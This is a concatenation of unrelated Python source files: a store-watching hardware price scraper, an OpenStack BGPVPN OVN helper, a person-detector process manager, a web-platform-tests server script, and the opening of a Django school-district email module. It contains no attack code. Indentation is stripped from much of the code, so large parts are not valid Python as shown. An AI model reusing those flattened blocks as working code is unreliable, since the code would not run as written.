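# subprocess's combined output in memory and only decompresses it via dump()
# when something needs to be reported. The echo command below is a placeholder.
def _subslurp_example():
    proc = subprocess.Popen(['echo', 'hello'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out = subslurp(proc.stdout)
    out.start()
    proc.wait()
    return out.dump()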
if __name__ == '__main__':
sys.exit(main())
|
store_watcher.py
|
from utilities import datetime, time_wrapper, file_handler, sleep
from yaml import safe_load, safe_dump
from termcolor import colored
from threading import Thread
from scraper import run
from time import time
from sys import argv
def print_usage():
print("Usage: \tpython3 store_watcher.py STATE CATEGORIES INTERVAL")
print("States: \tboth, new, used.")
print("Categories: \tall, gpu, cpu.")
print("Interval: \t[INT][TIME UNIT], amount of given time units. To run once, set interval to '0s'.")
print("Time units: \ts - second, m - minute, h - hour.\n")
print("Example usages:\n")
print("# Check stores for new GPUs every 6 hours.")
print("python3 store_watcher.py new gpu 6h\n")
    print("# Check all stores (both new and used parts) once, for every supported category.")
print("python3 store_watcher.py both all 0s\n")
return None
def parse_args(args: [str]):
if len(args) < 4:
print("Invalid call! Missing arguments.\n")
print_usage()
return None
if args[1] not in ["both", "new", "used"]:
print("Invalid call! Unsupported bargain type.\n")
print_usage()
return None
if not all(map(lambda x: x in ["all", "gpu", "cpu"], args[2:-1])):
print("Invalid call! Unsupported hardware category.\n")
print_usage()
return None
if not all(map(lambda x: x in "0123456789smh", args[-1])):
print("Invalid call! Unsupported interval.\n")
print_usage()
return None
return args[1], args[2:-1], int(args[-1][:-1]) * {"s": 1, "m": 60, "h": 3600}.get(args[-1][-1], 1)
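# Illustrative (hedged) examples of parse_args return values, mirroring print_usage:
#   parse_args(["store_watcher.py", "new", "gpu", "6h"])  -> ("new", ["gpu"], 21600)
#   parse_args(["store_watcher.py", "both", "all", "0s"]) -> ("both", ["all"], 0)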
def scrape_store(store_dict: dict, store_name: str, catalog: dict, categories: dict, start_time: float) -> None:
timestamp = time_wrapper(time_format="%d-%m-%Y_%H-%M", return_type="time")
store_dict["last_update"] = timestamp
data = run(store_dict, catalog, categories, start_time)
end_time = round(time() - start_time, 3)
if data is None:
        print(f"[ {colored('UPDATE FAILED', color='red')} ] {store_name}")
return None
file_handler(f"cache/cache_{timestamp}_{store_name}.yaml", "w", content=data, wrapper=safe_dump)
print(f"[ {colored('UPDATED', color='green')} ] {store_name} in {end_time}s.")
return None
# Check if store is compliant with the criteria given by user
def check_store(store_dict: dict, store_name: str, requested_type: str) -> bool:
if not store_dict["allowed"] or (store_dict["store_type"] != requested_type and requested_type != "both"):
print(f"[ {colored('SKIPPED', color='yellow')} ] {store_name} - store filtered by criteria.")
return False
if "last_update" not in store_dict:
print(f"[ {colored('UPDATING', color='blue')} ] {store_name} - last update info not found.")
return True
last_update = datetime.strptime(store_dict["last_update"], "%d-%m-%Y_%H-%M")
current_time = datetime.strptime(datetime.today().strftime("%d-%m-%Y_%H-%M"), "%d-%m-%Y_%H-%M")
data_age = current_time.timestamp() - last_update.timestamp()
print(f"[ {colored('UPDATING', color='blue')} ] {store_name} - data is {round(data_age / 60, 0)} minutes old.")
return True
# Prepares a list of stores to scrape, then starts scraping them and stores results at the end
def scraper(store_type: str, categories: [str]) -> float:
start_time = time()
stores = file_handler(f"config/stores.yaml", "r", wrapper=safe_load)
catalog = file_handler(f"config/product_catalog.yaml", "r", wrapper=safe_load)
threads = []
for store in stores:
if check_store(stores[store], store, store_type):
threads.append(Thread(target=scrape_store, args=(stores[store], store, catalog, categories, start_time, )))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
file_handler("config/stores.yaml", "w", content=stores, wrapper=safe_dump)
return round(time() - start_time, 3)
def store_watcher():
parsed_argv = parse_args(argv)
if parsed_argv is None:
exit(1)
# One time parsing
if parsed_argv[2] == 0:
scraper(parsed_argv[0], parsed_argv[1])
return None
# Parsing on repeat
while True:
try:
            time_elapsed = scraper(parsed_argv[0], parsed_argv[1])
            # Seconds remaining until the next scheduled run (interval minus time spent scraping).
            time_to_next_run = parsed_argv[2] - time_elapsed
if time_to_next_run < 0:
continue
print(f"Next scraping in {round(time_to_next_run / 60, 2)} minutes.")
sleep(time_to_next_run)
except KeyboardInterrupt:
if input("\nDo you wish to end the scraping [Y/n]? ") in "Yy":
exit(0)
            print("Continuing scraping.")
return None
if __name__ == '__main__':
store_watcher()
|
helper.py
|
# Copyright 2021 Red Hat, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import queue
import threading
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib.db import api as db_api
from neutron_lib import constants as n_lib_consts
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_log import log as logging
from ovs.stream import Stream
from networking_bgpvpn.neutron.services.service_drivers.ovn.common \
import config
from networking_bgpvpn.neutron.services.service_drivers.ovn.common \
import constants
from networking_bgpvpn.neutron.services.service_drivers.ovn.ovsdb \
import impl_idl_ovn
LOG = logging.getLogger(__name__)
class OvnProviderHelper():
def __init__(self):
self._requests = queue.Queue()
self._helper_thread = threading.Thread(target=self._request_handler)
self._helper_thread.daemon = True
self._check_and_set_ssl_files()
self._init_bgpvpn_actions()
self._subscribe()
self._helper_thread.start()
def _subscribe(self):
registry.subscribe(self._post_fork_initialize,
resources.PROCESS,
events.AFTER_INIT)
def _post_fork_initialize(self, resource, event, trigger, payload=None):
# We need to open a connection to OVN Northbound database for
# each worker so that we can process the BGPVPN requests.
self.ovn_nbdb = impl_idl_ovn.OvnNbIdlForBgpVpn()
self.ovn_nbdb_api = self.ovn_nbdb.start()
def _init_bgpvpn_actions(self):
self._bgpvpn_request_func_maps = {
constants.REQ_TYPE_CREATE_ROUTER_ASSOC: self.create_router_assoc,
constants.REQ_TYPE_DELETE_ROUTER_ASSOC: self.delete_router_assoc,
constants.REQ_TYPE_ADD_ROUTER_INTERFACE: self.add_router_interface,
}
def _check_and_set_ssl_files(self):
priv_key_file = config.get_ovn_nb_private_key()
cert_file = config.get_ovn_nb_certificate()
ca_cert_file = config.get_ovn_nb_ca_cert()
if priv_key_file:
Stream.ssl_set_private_key_file(priv_key_file)
if cert_file:
Stream.ssl_set_certificate_file(cert_file)
if ca_cert_file:
Stream.ssl_set_ca_cert_file(ca_cert_file)
def _request_handler(self):
while True:
request = self._requests.get()
request_type = request['type']
if request_type == constants.REQ_TYPE_EXIT:
break
request_handler = self._bgpvpn_request_func_maps.get(request_type)
try:
if request_handler:
request_handler(request['info'])
self._requests.task_done()
except Exception:
# If any unexpected exception happens we don't want the
# notify_loop to exit.
# TODO(cgoncalves): The resource(s) we were updating status for
# should be cleaned-up
LOG.exception('Unexpected exception in request_handler')
def _execute_commands(self, commands):
with self.ovn_nbdb_api.transaction(check_error=True) as txn:
for command in commands:
txn.add(command)
def shutdown(self):
self._requests.put({'type': constants.REQ_TYPE_EXIT})
self._helper_thread.join()
self.ovn_nbdb.stop()
del self.ovn_nbdb_api
def add_request(self, req):
self._requests.put(req)
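    # Hedged sketch of the request shape consumed by _request_handler; the
    # 'info' payload below is illustrative, matching the keys read by
    # create_router_assoc (context, router_association, bgpvpn):
    #
    #   helper.add_request({
    #       'type': constants.REQ_TYPE_CREATE_ROUTER_ASSOC,
    #       'info': {
    #           'context': context,
    #           'router_association': {'router_id': router_id},
    #           'bgpvpn': {'vni': 1000},
    #       },
    #   })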
def create_router_assoc(self, info):
LOG.debug('Creating router association in OVN Northbound database...')
context = info['context']
router_assoc = info['router_association']
bgpvpn = info['bgpvpn']
router_id = router_assoc['router_id']
external_ids = {
constants.OVN_EVPN_VNI_EXT_ID_KEY: str(bgpvpn.get('vni')),
constants.OVN_EVPN_AS_EXT_ID_KEY: str(cfg.CONF.ovn.bgp_as)}
filters = {'device_id': [router_id],
'device_owner': n_lib_consts.ROUTER_PORT_OWNERS}
with db_api.CONTEXT_READER.using(context):
router_ports = directory.get_plugin().get_ports(context, filters)
# Add VNI to router ports
port_ids = []
for iface in router_ports:
lsp = self.ovn_nbdb_api.lsp_get(
iface['id']).execute(check_error=True)
port_ids.append(lsp.uuid)
commands = []
for port_id in port_ids:
commands.append(
self.ovn_nbdb_api.db_set(
'Logical_Switch_Port', port_id,
('external_ids', external_ids)))
self._execute_commands(commands)
LOG.debug('Created router association in OVN Northbound database!')
def delete_router_assoc(self, info):
LOG.debug('Deleting router association in OVN Northbound database...')
context = info['context']
router_assoc = info['router_association']
router_id = router_assoc['router_id']
filters = {'device_id': [router_id],
'device_owner': n_lib_consts.ROUTER_PORT_OWNERS}
with db_api.CONTEXT_READER.using(context):
router_ports = directory.get_plugin().get_ports(context, filters)
# Remove VNI from router ports
port_ids = []
for iface in router_ports:
lsp = self.ovn_nbdb_api.lsp_get(
iface['id']).execute(check_error=True)
port_ids.append(lsp.uuid)
commands = []
for port_id in port_ids:
commands.append(
self.ovn_nbdb_api.db_remove(
'Logical_Switch_Port', port_id,
'external_ids', (constants.OVN_EVPN_VNI_EXT_ID_KEY)))
self._execute_commands(commands)
LOG.debug('Deleted router association in OVN Northbound database!')
def add_router_interface(self, info):
LOG.debug('Adding router interface in OVN Northbound database...')
port_id = info['port_id']
bgpvpn = info['bgpvpn']
external_ids = {
constants.OVN_EVPN_VNI_EXT_ID_KEY: str(bgpvpn.get('vni')),
constants.OVN_EVPN_AS_EXT_ID_KEY: str(cfg.CONF.ovn.bgp_as)}
lsp = self.ovn_nbdb_api.lsp_get(port_id).execute(check_error=True)
self.ovn_nbdb_api.db_set(
'Logical_Switch_Port', lsp.uuid,
('external_ids', external_ids)).execute(check_error=True)
LOG.debug('Added router interface in OVN Northbound database!')
def remove_router_interface(self, info):
LOG.debug('Removing router interface in OVN Northbound database...')
port_id = info['port_id']
lsp = self.ovn_nbdb_api.lsp_get(port_id).execute(check_error=True)
self.ovn_nbdb_api.db_remove(
'Logical_Switch_Port', lsp.uuid, 'external_ids',
(constants.OVN_EVPN_VNI_EXT_ID_KEY)).execute(check_error=True)
        LOG.debug('Removed router interface in OVN Northbound database!')
|
OPManager.py
|
import multiprocessing
from multiprocessing import Queue
from OpenPersonDetector import OpenPersonDetector
from newgen.GenerativeDetector import AbstractDetectorGenerator
class ManagedOPDetector:
def __init__(self, input_queue, output_queue):
self.input_queue = input_queue
self.output_queue = output_queue
def detectPersons(self, image, discardedGrayImage):
self.input_queue.put(image)
return self.output_queue.get()
class ManagedOPDetectorGenerator(AbstractDetectorGenerator):
def __init__(self, input_queue, output_queue):
super().__init__()
self.input_queue = input_queue
self.output_queue = output_queue
def generate_detector(self):
return ManagedOPDetector(self.input_queue, self.output_queue)
class ManagedOP:
def __init__(self):
self.queue_pairs = []
self.worker = None
def obtainGenerator(self):
input_queue = Queue()
output_queue = Queue()
self.queue_pairs.append((input_queue, output_queue))
return ManagedOPDetectorGenerator(input_queue, output_queue)
def _async_worker(self, queue_pairs):
person_detector = OpenPersonDetector(preview=False)
while True:
for input_queue, output_queue in queue_pairs:
if input_queue.qsize() > 0:
frame = input_queue.get()
person_detections = person_detector.detectPersons(frame, None)
output_queue.put(person_detections)
def startAsync(self):
self.worker = multiprocessing.Process(target=self._async_worker, args=(self.queue_pairs,))
self.worker.daemon = True
self.worker.start()
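# Hedged usage sketch: ManagedOP multiplexes several consumers onto one
# OpenPersonDetector process via multiprocessing queues. `frame` below is a
# placeholder for an image obtained elsewhere.
#
#   manager = ManagedOP()
#   generator = manager.obtainGenerator()       # one generator per consumer
#   manager.startAsync()                        # launch the shared detector process
#   detector = generator.generate_detector()
#   detections = detector.detectPersons(frame, None)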
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import os
import re
import socket
import sys
import threading
import time
import traceback
import urllib2
import uuid
from collections import defaultdict, OrderedDict
from multiprocessing import Process, Event
from localpaths import repo_root
import sslutils
from manifest.sourcefile import read_script_metadata, js_meta_re
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port
from mod_pywebsocket import standalone as pywebsocket
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
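# Illustrative example (hedged):
#   replace_end("x.any.worker.html", ".any.worker.html", ".any.js") -> "x.any.js"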
class WrapperHandler(object):
    __metaclass__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
path = self._get_path(request.url_parts.path, True)
meta = "\n".join(self._get_meta(request))
response.content = self.wrapper % {"meta": meta, "path": path}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on //META comments in the associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
class HtmlWrapperHandler(WrapperHandler):
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"script":
            attribute = value.decode('utf-8').replace('"', "&quot;").replace(">", "&gt;")
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
if key == b"timeout":
return None
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
return None
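# Hedged illustration of the path_replace triples above: a request for
# "/dir/x.any.worker.html" is served by WorkersHandler, whose wrapper loads
# "/dir/x.any.worker.js" (the resource path), while the //META comments are
# read from the on-disk file "/dir/x.any.js" (the filesystem path).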
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"))
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler),
("*", "/nodejs/*", handlers.WaveProxyHandler(config.ports["wave"][0]))]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/serve.py", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler(b"GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
b"%s%s" % (str(url_base) if url_base != "/" else "", str(suffix)),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
            logger.error("\"url-path\" value must start with '/' and \"local-dir\" must be non-empty.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
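# Hedged sketch of the alias entries build_routes expects (the "aliases" list
# from the config); the key names come from the loop above, the values are
# placeholders:
#
#   build_routes([
#       {"url-path": "/fonts/", "local-dir": "fonts"},        # trailing "/" -> directory mount
#       {"url-path": "/favicon.ico", "local-dir": "misc"},    # otherwise -> single-file mount
#   ])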
class ServerProc(object):
def __init__(self):
self.proc = None
self.daemon = None
self.stop = Event()
def start(self, init_func, host, port, paths, routes, bind_address, config,
ssl_config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config, ssl_config),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, ssl_config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config,
ssl_config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(domains, paths, bind_address, ssl_config, aliases):
domains = domains.copy()
host = domains.pop("")
port = get_port(host)
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases), bind_address,
None, ssl_config)
connected = False
for i in range(10):
try:
urllib2.urlopen("http://%s:%d/" % (host, port))
connected = True
break
except urllib2.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server on http://%s:%s. "
"You may need to edit /etc/hosts or similar, see README.md." % (host, port))
sys.exit(1)
for domain in domains.itervalues():
try:
urllib2.urlopen("http://%s:%d/" % (domain, port))
except Exception as e:
logger.critical("Failed probing domain %s. "
"You may need to edit /etc/hosts or similar, see README.md." % domain)
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config["domains"].values():
rv.append("%s\t%s\n" % (host, domain))
for not_domain in config.get("not_domains", {}).values():
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
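# Illustrative sketch (assumed domains): with host "127.0.0.1" and domains of
# "web-platform.test" and "www.web-platform.test", make_hosts_file returns
# tab-separated lines such as:
#   127.0.0.1   web-platform.test
#   127.0.0.1   www.web-platform.test
# plus "0.0.0.0" entries for any configured not_domains.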
def start_servers(host, ports, paths, routes, bind_address, config, ssl_config,
**kwargs):
servers = defaultdict(list)
for scheme, ports in ports.iteritems():
assert len(ports) == {"http":2}.get(scheme, 1)
for port in ports:
if port is None:
continue
if scheme == u'wave':
continue
init_func = {"http":start_http_server,
"https":start_https_server,
"ws":start_ws_server,
"wss":start_wss_server}[scheme]
server_proc = ServerProc()
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, ssl_config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=ssl_config["key_path"],
certificate=ssl_config["cert_path"],
encrypt_after_connect=ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, log_level, bind_address,
ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root,
"--log-level", log_level]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_address,
ssl_config = None)
def start_wss_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_address,
ssl_config)
def start(config, ssl_environment, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
ssl_config = config.ssl_config
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config,
ssl_config, **kwargs)
return servers
def iter_procs(servers):
    for server_list in servers.values():
        for port, server in server_list:
yield server.proc
def load_config(default_path, override_path=None, **kwargs):
if os.path.exists(default_path):
with open(default_path) as f:
base_obj = json.load(f)
else:
raise ValueError("Config path %s does not exist" % default_path)
rv = Config(**base_obj)
    if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent-origin"}
class Config(config.Config):
"""serve config
this subclasses wptserve.config.Config to add serve config options"""
def __init__(self, *args, **kwargs):
super(Config, self).__init__(
subdomains=_subdomains,
not_subdomains=_not_subdomains,
*args,
**kwargs
)
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
return parser
def run(**kwargs):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"),
**kwargs)
global logger
logger = config.logger
set_logger(logger)
bind_address = config["bind_address"]
if config["check_subdomains"]:
paths = config.paths
ssl_config = config.ssl_config
check_subdomains(config.domains, paths, bind_address, ssl_config, config["aliases"])
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(config.server_host))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, config.ssl_env, build_routes(config["aliases"]), **kwargs)
try:
while any(item.is_alive() for item in iter_procs(servers)):
for item in iter_procs(servers):
item.join(1)
except KeyboardInterrupt:
logger.info("Shutting down")
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
functions.py
|
import os
import shutil
import re
import uuid
from urllib.parse import urlparse, urlsplit, urlunsplit
from django.conf import settings
from django.apps import apps
from django.db.models import Q
from django.core.mail import EmailMessage
from django.contrib.auth import get_permission_codename
from guardian.shortcuts import get_perms
from django.core.exceptions import FieldDoesNotExist
from django.utils import timezone
from datetime import timedelta
from ckeditor.fields import RichTextField
# Required for response change
import base64
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.http import HttpResponseRedirect
from django.utils.http import urlquote
from django.contrib import messages
from django.contrib.sites.models import Site
from multisite.models import Alias
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from pilkit.utils import suggest_extension
from threading import Thread
from collections import OrderedDict
def multisite_fallback_view(request):
pass
def contactmessage_confirm(self):
email = EmailMessage(
'THANK YOU: ' + self.message_subject,
('<p>We have received your message. '
'We will get back to you shortly.</p>'
'<br><p><strong>Original Message</strong>'
'</p><br><p>' + self.your_message + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
[self.your_email],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def contactmessage_message(self):
email = EmailMessage(
'WEBSITE CONTACT: ' + self.message_subject,
('<p><strong>From:</strong> {0}: {1}</p>'
'<p><strong>To:</strong> {2}</p><p><strong>Page:</strong> '
'<a href="https://{5}{3}">https://{5}'
'{3}</a></p><p><strong>Message:</strong><br>{4}</p>').format(
self.your_name,
self.your_email,
self.primary_contact.email,
self.parent.url,
self.your_message,
get_domain(self.site),
),
'"{0}" <{1}>'.format(self.your_name, self.your_email),
[self.primary_contact.email],
bcc=['webmaster@slcschools.org'],
reply_to=[self.your_email],
headers={
'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8],
'Sender': ('Salt Lake City School District'
'<webmaster@slcschools.org>'),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def customerror_emailadmins(subject, message):
email = EmailMessage(
subject,
message,
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={
'Message-ID': str(uuid.uuid4()),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def urlchanged_email(self, oldurl):
email = EmailMessage(
'Website URL Changed App {0} Type {1}'.format(
